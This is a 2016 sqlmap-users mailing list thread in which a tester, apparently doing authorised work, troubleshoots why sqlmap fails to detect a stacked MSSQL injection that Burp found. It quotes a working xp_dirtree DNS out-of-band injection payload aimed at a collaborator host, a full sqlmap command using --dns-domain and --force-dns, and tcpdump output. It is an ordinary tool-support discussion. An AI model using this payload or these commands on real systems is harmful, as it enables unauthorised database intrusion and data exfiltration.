Re: [sqlmap-users] Sqlmap/DNS exfil

Mon, 19 Dec 2016 15:07:08 -0800 

As said, there should be at least one other SQLi technique available. In
your case there is NONE. sqlmap will not blindly use dns-exfil if at least
one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com> wrote:

> Thanks, that's good advice.  And I probably should post a little more
> detail on what I'm running here so others can see it as well.
>
>
> Here's the command executing:
>
>
> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
> "Windows" --threads 1
>         ___
>        __H__
>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
> |_ -| . [)]     | .'| . |
> |___|_  [']_|_|_|__,|  _|
>       |_|V          |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:56:14
>
> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
> [16:56:14] [INFO] setting up DNS server instance
> custom injection marking character ('*') found in option
> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
> [Y/n/q] n
> [16:56:16] [INFO] testing connection to the target URL
> [16:56:18] [INFO] testing if the target URL is stable
> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
> 'ProductCategory' might not be injectable
> [16:56:23] [INFO] testing for SQL injection on GET parameter
> 'ProductCategory'
> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause (IN)'
> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
> (comment)'
> [16:56:39] [WARNING] time-based comparison requires larger statistical
> model, please wait......... (done)
> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
> (IF)'
> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
> injectable
> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
> Try to increase '--level'/'--risk' values to perform more tests. Also, you
> can try to rerun by providing either a valid value for option '--string'
> (or '--regexp'). If you suspect that there is some kind of protection
> mechanism involved (e.g. WAF) maybe you could retry with an option
> '--tamper' (e.g. '--tamper=space2comment')
> [16:58:03] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 98 times
>
> [*] shutting down at 16:58:03
>
>
>
> And then, my capture results for DNS traffic:
>
>
> root@bass:~# tcpdump -n -i eth0 udp port 53
> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
> www.testsite.org. (30)
> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
> www.testsite.org. (30)
> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
> www.testsite.org. (30)
> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
> www.testsite.org. (30)
> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
> www.testsite.org. (30)
> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
> www.testsite.org. (30)
> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
> 173.213.231.200 (46)
> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
> www.testsite.org. (30)
> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
> www.testsite.org. (30)
> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
> 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
> www.testsite.org. (30)
> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
> www.testsite.org. (30)
> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
> 173.213.231.200 (46)
> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>
>
> It doesn't seem like an injection pattern is being tried that is getting
> the DNS exfiltration to occur... or else I'm doing something else wrong.
>
>
> Thanks,
>
> V
>
> ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *Sent:* Monday, December 19, 2016 4:10 PM
> *To:* Mark M.
> *Cc:* sqlmap-users@lists.sourceforge.net
> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>
> I would suggest you to run the wireshark or similar when running the
> --dns-domain to properly debug what is going on. There could be really lots
> of problems before you fine tune it (e.g. other service running on :53).
>
> About the "forcing" sqlmap for using dns-exfil. It will always at least
> try to test it at the start of a run (if other injection technique
> available). Also, it will prefer other "faster" techniques (ERROR and
> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
> which will force the usage of dns-exfil even if ERROR/UNION are available.
>
> As said, the best advice I can give to you is to run the wireshark during
> the run and really see what is going on.
>
> Bye
>
> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
>
>> I have a situation where Burp has detected the following DNS exfiltration
>> injection for a query parameter in a web app:
>>
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%
>> 20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
>> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.d
>> bo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>>
>> To make that a little easier to read, the injected value is:
>>
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>> @q;--
>>
>>
>> I've modified the domain and verified that I receive the DNS requests on
>> my local DNS server (the domain which I provide to sqlmap using the
>> --dns-domain=xxx option) when the injection is manually sent to the page.
>> The problem is, when I pass the request to sqlmap it's not detecting that
>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
>> still no dice.  I'm using sqlmap v1.0.12#stable.
>>
>>
>> Since I've gotten many other injections to work in the past, I believe
>> that I'm using sqlmap properly (formatting my request in a file
>> appropriately, specifying the correct parameter to test, etc.)  However, it
>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>> injection would slip by all of sqlmap's tests. Is there a way to force
>> sqlmap to try DNS exfiltration injections despite no other injection
>> technique succeeding?
>>
>>
>> Thanks
>>
>> V
>>
>>
>>
>>
>> ------------------------------------------------------------
>> ------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today.http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to